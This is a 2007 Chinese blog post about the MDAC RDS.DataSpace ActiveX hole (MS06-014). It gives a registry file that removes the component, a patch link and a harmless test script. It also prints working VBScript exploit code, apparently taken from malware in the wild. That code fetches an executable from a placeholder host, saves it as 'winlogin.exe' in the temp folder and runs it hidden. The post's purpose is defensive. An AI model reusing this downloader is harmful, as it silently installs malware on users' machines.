音樂盒成功建立連接,歡迎各位光臨

MRDS Fehler

上一篇 / 下一篇  2007-11-15 14:28:22 / 个人分类:Dienstprogramm

Microsoft MDAC RDS.Dataspace ActiveX组件安全漏洞
该组件文件存在于:
C:\Program Files\Common Files\System\msadc\msadco.dll
漏洞在线测试连接
http://nPower.vicp.net/test.htm

有问题的系统都会在网页中打开一个测试程序(没恶意)

现在大部份垃 圾网站都是利用该漏洞传播病毒、木马、流氓之类的垃 圾东西。

知道了原因,那就好办了,只要在你们的系统中删除该组件即可

方法一堆堆,改名、删除,或设置权限,反注册或从注册表中删除。

附上删除该组件注册表:

REGEDIT4

[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RDS.DataSpace]
[-HKEY_CLASSES_ROOT\CLSID\{BD96C556-65A3-11D0-983A-00C04FC29E36}]

官方补丁连接:
http://www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx

选其一即可,搞好后,以后就不需要再封网址,怕顾客上垃 圾网了。


IE中使用Rds.DataSpace下载并运行病毒文件

<script>
try
{
 var Dts = new ActiveXObject("RDS.DataSpace");
 var Stm = Dts.CreateObject("Microsoft.XmlHttp","");
 alert("您的机器存在漏洞,请及时打上补丁。");
}
catch(err)
{
 alert("您的机器不存在该漏洞:" + err.message);
}
</script>

相关病毒的vbs代码如下:


on error resume next
dl = "http://www.xxx.com/xxx.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="winlogin.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0


TAG:

 

评分:0

我来说两句

显示全部

:loveliness: :handshake :victory: :funk: :time: :kiss: :call: :hug: :lol :'( :Q :L ;P :$ :P :o :@ :D :( :)

日历

« 2008-12-02  
 123456
78910111213
14151617181920
21222324252627
28293031   

数据统计

  • 访问量: 5719
  • 日志数: 9
  • 图片数: 1
  • 建立时间: 2007-06-06
  • 更新时间: 2008-10-07

RSS订阅

Open Toolbar